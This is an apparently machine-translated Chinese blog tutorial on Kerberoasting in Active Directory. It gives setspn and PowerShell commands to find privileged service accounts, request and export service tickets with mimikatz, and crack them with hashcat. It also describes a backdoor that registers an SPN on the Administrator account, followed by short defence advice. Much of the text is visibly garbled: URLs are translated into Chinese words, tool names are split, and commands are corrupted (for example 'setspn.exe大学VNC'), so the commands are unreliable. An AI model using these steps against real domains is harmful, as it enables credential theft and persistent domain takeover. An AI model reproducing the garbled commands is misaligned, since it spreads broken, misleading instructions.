域渗透——广播

0x00 前言

Kerberoasting是域渗透中经常使用的一项技术，本文将参考公开的资料，结合自己的理解，详细介绍Kerberoasting的原理和实现，以及一个后门利用的方法，最后给出防御建议。

参考资料：

http://www。哈米。net/blog/powershell/Kerberos ast-without-Mimi Katz/

http://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/

https://malicious.link/post/2016/kerberoast-pt1/

https://malicious.link/post/2016/kerberoast-pt2/

https://malicious.link/post/2016/kerberoast-pt3/

https://adsecurity.org/?p=3458

https://adsecurity.org/?page_id=183

https://blog.netspi.com/faster-domain-escalation-using-ldap/

https://社会。TechNet。微软。com/wiki/目录/文章/717。service-principal-names-spns-setspn-syntax-setspn-exe。aspx

0x01 简介

本文将要介绍以下内容：

Kerberoasting相关概念

Kerberoasting的原理

Kerberoasting的实现

Kerberoasting的后门利用

Kerberoasting的防御

0x02 基本概念

SPN

官方文档：

https://份文件。微软。com/en-us/windows/desktop/AD/service-principal-names

全称服务主体名称

SPN是服务器上所运行服务的唯一标识，每个使用麻省理工学院开发的安全认证系统的服务都需要一个SPN

SPN分为两种，一种注册在广告上机器帐户（计算机)下，另一种注册在域用户帐户（用户)下

当一个服务的权限为本地系统或网络服务，则SPN注册在机器帐户（计算机)下

当一个服务的权限为一个域用户，则SPN注册在域用户帐户（用户)下

SPN的格式

服务类/主机：端口/服务名

说明：

服务类别可以理解为服务的名称，常见的有www，ldap，SMTP，DNS，主机等

宿主有两种形式，FQDN和网络基本输入输出系统(网络基本输入/输出系统)名，例如server01.test.com和服务器01

如果服务运行在默认端口上，则端口号（港口)可以省略

查询SPN

对域控制器发起轻量级目录访问协议查询，这是正常网络认证协议（名字来源于希腊神话中"三个头的狗——地狱之门守护者")票据行为的一部分，因此查询SPN的操作很难被检测

(1) 使用SetSPN

Win7和Windows Server2008自带的工具

查看当前域内的所有SPN:

setspn.exe-q */*

查看试验域内的所有SPN:

setspn.exe-T检验-q */*

输出结果实例：

CN=DC1，OU=域控制器，DC=测试，DC=com

exchangeRFR/DC1

exchangeRFR/DC1.test.com

exchangeMDB/DC1.test.com

exchangeMDB/DC1

exchangeAB/DC1

exchangeAB/DC1.test.com

SMTP/DC1

SMTP/DC1.test.com

SmtpSvc/DC1

SmtpSvc/DC1.test.com

LDAP/dc1。测试。com/forestdnszones。测试。com

LDAP/dc1。测试。com/域DNS区域。测试。com

dfsr-12 F9 a 27 c-BF97-4787-9364-d 31 b 6 c 55 EB 04/dc1。测试。com

DNS/DC1.test.com

GC/DC1.test.com/test.com

RestrictedKrbHost/DC1.test.com

RestrictedKrbHost/DC1

主机/DC1/测试

HOST/DC1.test.com/TEST

主机/DC1

HOST/DC1.test.com

HOST/DC1.test.com/test.com

e 3514235-4b 06-11 D1-AB04-00 c 04 fc 2d CD 2/0f 33253 b-2314-40f 0-b665-f 4317 b 13 E6 b 9/测试。com

LDAP/DC1/测试

LDAP/0f 33253 b-2314-40f 0-b665-f 4317 b 13 e6b 9 ._msdcs.test.com

ldap/DC1.test.com/TEST

ldap/DC1

ldap/DC1.test.com

ldap/DC1.test.com/test.com

CN=krbtgt，CN=用户，DC=测试，DC=com

kadmin/changepw

CN=计算机01，CN=计算机，DC=测试，DC=通讯

RestrictedKrbHost/COMPUTER01

主机/计算机01

受限krb host/计算机01。测试。com

主机/计算机01.test.com

CN=MSSQL服务管理，CN=用户，DC=测试，DC=com

MSSQLSvc/DC1.test.com

以通信网络(交流网的缩写)开头的每一行代表一个帐户，其下的信息是与该帐户相关联的SPN

对于上面的输出数据，机器帐户（计算机)为：

CN=DC1，OU=域控制器，DC=测试，DC=com

CN=计算机01，CN=计算机，DC=测试，DC=通讯

域用户帐户（用户)为：

CN=krbtgt，CN=用户，DC=测试，DC=com

CN=MSSQL服务管理，CN=用户，DC=测试，DC=com

注册在域用户帐户（用户)下的SPN有两个：kadmin/changepw和MSSQLSvc/DC1.test.com

0x03 Kerberoasting的原理

1、Kerberos认证过程

一个简单的麻省理工学院开发的安全认证系统认证过程如下图

as _请求

as _回复

tgs _请求

tgs _回复

ap _请求

ap _回复

4.对于4.tgs_reply，用户会收到目标服务实例NTLM哈希加密生成的tgs(服务票)，加密算法是RC4-HMAC。

从利用的角度来看，获得这个TGS后，可以尝试穷尽密码，模拟加密过程，生成TGS进行对比。如果TGS相同，并且代表性密码正确，则可以获得目标服务实例的明文密码。

2、Windows系统通过SPN查询获得服务和服务实例帐户的对应关系

这里有一个例子：

a .要访问MySQL服务的资源，当用户转到4.tgs_reply时，步骤如下：

(1)域控制器查询MySQL服务的SPN。

如果SPN是在机器帐户(计算机)下注册的，将查询所有机器帐户(计算机)的servicePrincipalName属性以找到相应的帐户。

如果SPN是在域用户帐户(Users)下注册的，将查询所有域用户的servicePrincipalName属性来查找对应的帐户。

(2)找到对应的账户后，使用该账户的NTLM哈希生成TGS

3、域内的主机都能查询SPN

4、域内的任何用户都可以向域内的任何服务请求TGS

综上所述，域内任何主机都可以查询SPN，向域内所有服务请求TGS，得到TGS后暴力破解。

对于被破解的明文密码，只有域用户帐户(Users)的密码才有值，而不考虑机器帐户(不能用于远程连接)的密码。

因此，高效利用的思路如下：

要查询SPN并找到有价值的SPN，需要满足以下条件：

SPN是在域用户帐户(用户)下注册的

域用户帐户具有高权限。

请求TGS

出口TGS

强力

0x04 Kerberoasting的实现方法一

1、获得有价值的SPN

需要满足以下条件：

SPN是在域用户帐户(用户)下注册的

域用户帐户具有高权限。

您可以选择以下三种方法：

(1)使用powershell模块Active Directory

注：

Powershell模块Active Directory需要提前安装，通常会安装域控制器。

导入模块ActiveDirectory

get-aduser-filter { admin count-eq1-and(servicePrincipalName-ne 0)}-prop * | select name，whencreated，pwdlastset，lastlogon

对于未安装Active Directory模块的系统，您可以通过以下命令导入Active Directory模块：

导入模块。\微软。ActiveDirectory.Management.dll

微软。ActiveDirectory.Management.dll是在安装powershell模块Active Directory后生成的，我已经解压并上传到github:

https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll

(2)使用PowerView

https://github . com/powershell mafia/PowerSploit/blob/dev/Recon/power view . PS1

get-net user-SPN-admin count |选择名称，创建时间，pwdlastset，lastlogon

(3)使用kerberoast

powershell:

https://github . com/nidem/Kerberos ast/blob/master/getuserspns . PS1

vbs:

https://github . com/nidem/Kerberos/blob/master/getuserspns . VBS

参数如下：

cscript GetUserSPNs.vbs

2、请求TGS

(1)请求指定TGS

$ SPN name=' MSSQL SVC/dc1 . test . com '

添加类型程序集名称系统。身份模型

新对象系统。identity model . tokens . Kerberos requestorsecuritytoken-argument list $ SPN name

(2)请求所有TGS

添加类型程序集名称系统。身份模型

setspn.exe-q */* | select-string '^cn'上下文0，1 | % {新对象系统。身份模型。tokens . Kerberos requestorsecuritytoken-argument list $ _ . context . post context[0]。Trim() }

执行后，进入klist查看内存中的账单，可以找到您获得的TGS。

3、导出

使用mimikatz

kerberos:列表/导出

4、破解

https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py。/tgsrepcrack . py word list . txt test . kir bi

0x05 Kerberoasting的实现方法二

自动，不需要mimikatz，普通用户权限，资源：

http://www . harmj 0y . net/blog/powershell/Kerberos ast-without-mimikatz/

代码地址：

https://github . com/Empire project/Empire/commit/6ee7e 036607 a62b 0192 daed 46d 3711 AFC 65 c 3921

使用系统。identity model . tokens . Kerberos requestorsecuritytoken请求TGS，从返回的结果中提取TGS，并选择开膛手约翰或哈希卡特来破解输出TGS。

示例演示：

在域中的主机上以普通用户权限执行：

invoke-Kerberos ast-AdminCount-output format Hashcat | fl

-AdminCount表示选择具有高权限的用户。

输出结果如下

只有提取的散列的参数如下：

invoke-Kerberos ast-AdminCount-output format Hashcat | Select hash | convert to-CSV-notype information

输出结果如下

用hashcat破解的参数如下：

hashcat-m 13100/tmp/hash . txt/tmp/password . list-o found . txt-force

破解结果如下图，成功获得明文密码MySQLAdmin111！

注：

Rubeus也可以实现Invoke-Kerberos ast的功能，地址如下：

https://github.com/GhostPack/Rubeus

参数如下：

Rubeus.exe克伯罗斯

0x06 Kerberoasting的后门利用

在我们获得了SPN的修改权限后，就可以为指定的域用户添加一个SPN，这样就可以随时获取该域用户的TGS，被破解后得到明文密码。

例如，使用以下参数为域用户Administrator添加SPNVNC/DC1.test.com:

setspn.exe大学VNC/DC1.test.com管理员

如下图

域中的任何主机都可以获得SPN，并且可以使用Kerberoast获得TGS，如下图所示。

然后用hashcat破解。

补充：

删除SPN的参数如下：

setspn.exe-VNC/dc1 . test . com管理员

0x07 防御

从防御角度来说，无法阻止kerberoast，但可以增加具有攻击值的SPN(注册在权限高的域用户账号下)的密码长度，可以提高破解难度，并定期修改关联域用户的密码。

管理员可以在域中的主机上使用Invoke-Kerberos ast来检查是否存在危险的SPN。

下载地址：

https://github . com/powershell mafia/PowerSploit/blob/dev/Recon/power view . PS1

参数：

get-net user-SPN-admin count |选择名称，创建时间，pwdlastset，lastlogon

0x08 小结

本文详细介绍了Kerberoasting认证的原理、方法和防御，并给出了一个实例。

留下回复